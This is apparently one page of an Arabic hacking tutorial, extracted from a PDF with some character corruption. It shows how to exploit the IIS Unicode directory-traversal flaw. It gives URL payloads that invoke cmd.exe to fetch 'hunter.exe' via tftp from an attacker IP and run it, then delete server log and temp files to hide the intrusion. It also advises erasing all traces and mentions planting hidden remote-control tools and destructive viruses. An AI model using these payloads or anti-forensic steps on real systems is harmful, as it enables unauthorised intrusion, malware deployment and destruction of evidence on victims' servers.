Page 142 - بسم الله الرحمن الرحيم

P. 142

‫لنفرض اننا نريد تصحميل ملف ‪ EXE‬على السيرفر وسميناه ‪ hunter.exe‬ونريد تصشغيله فكيف لنا ذلك ؟‬
‫سنتبع التصي ‪:‬‬

‫نقو‪.‬م بتحميل الملف على السيرفر كما قمنا بتحميل ‪ index.htm‬ونضعه في \‪ C:‬للسيرفر عبر هذه التوليفه‬
‫‪:‬‬

‫‪msadc/..%c1%9c../..%c1%9c../../‬‬
‫‪%c1%9c../winnt/system32/cmd.exe?/c+tftp.exe+"-‬‬
‫‪i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe‬‬

‫بعد ان يتم تصحميل الملف سنشغله عبر تصنفيذ هذا المر‬

‫‪msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe/‬‬
‫او عن طريق هذا المر‬

‫‪msadc/..%c1%9c../..%c1%9c../../‬‬
‫‪%c1%9c../winnt/system32/cmd.exe?/c+hunter.exe‬‬

‫الن وقد قاربنا على النتهاء بقي لدينا في السيرفر عمل واحد فقط ال وهو مسح ملفات اللوج ‪*.log‬‬
‫وسيكون ذلك عن طريق هذا المر ‪:‬‬

‫‪msadc/..%c0%af../..%c0%af../../‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.log/s‬‬

‫هناك انواع اخترى من الملفات يتم تصخزين فيها بعض المعلومات ويفضل مسحها ايضا وهي مثل الملفات ذات‬
‫المتداد ‪tmp‬‬

‫وهذا امر مسحها عبر اليونيكود ‪:‬‬
‫‪msadc/..%c0%af../..%c0%af../../‬‬
‫‪%c0%af../winnt/system32/cmd.exe?/c+del+C:\*.tmp/s‬‬
‫ايضا ملحوظه مهمه وهي ان ل تصبقى اي معلومات عنك في السيرفر كما يفعل البعض بذكر اسمائهم او‬
‫ايميلتصهم الحقيقيه قم بمسح اي شيء يدل عليك‬
‫او على عملية الختتراق )) حاول ان تصصل الى هذا المستوى ((‬
‫هناك عدد من الشياء والفكار لن اتصطرق اليها مثل ارسال فايروس ما او امر على ملف ‪ bat‬حتى تصتمكن من‬

‫وضع مشكله كبيره في السيرفر لكي ل يعمل‬
‫او ان تصرسل فايروس يقو‪.‬م بمحو جهميع ملفات النظا‪.‬م او ان تصمرز نفسك لديهم في السيرفر عن طريق برامج‬

‫التحكم عن بعد و اختفائها بشكل جهيد‬
‫في المجلدات ذات الملفات الكثير )) مثل ‪ (( system32‬والكثير الكثير‬

‫______________________________________________________________‬
‫__________________‬

‫ملحوظات ‪ :‬لن تصعمل هذه الثغره في كل الحالت فهناك بعض السيرفرات يقومون بقطع الطريق عليك عن‬
‫طريق مسح ملف ‪ tftp‬من سيرفراتصهم‬

‫)) الملف المسؤول عن ذلك موجهود في المجلد ‪ (( system32‬وبعض السيرفرات قامت بعملية الترقيع‬
‫)) اصدرت ميكروسوفت تصرقيعا لهذه الثغره ((‬

‫وبعضهم قد يكون واضع فاير وول يقو‪.‬م بمراقبة الباكيج الصادر والوارد وقد يقو‪.‬م بعمل اصطياد لمثل هذه‬
‫العمليات‬

‫واخترون يقومون بتركيب برنامج الحمايه القوي جهدا في نظم ‪ IIS‬ال وهو ‪ Secure IIS‬من شركة ‪Eeye‬‬
‫والعديد العديد من العقبات ولكن عند كتابة هذا الموضوع )) قبل حوالي اربعة اشهر (( كان ما يقارب ‪%90‬‬

‫من السيرفرات التي فيها نظا‪.‬م ‪IIS‬‬
‫تصحوي هذه الثغره وبدون تصرقيع )) لعد‪.‬م وجهوده وقتها (( او لهمال المدير‪.‬‬

‫انتهى‪،،،‬‬

‫‪142‬‬

137 138 139 140 141 142 143 144 145 146 147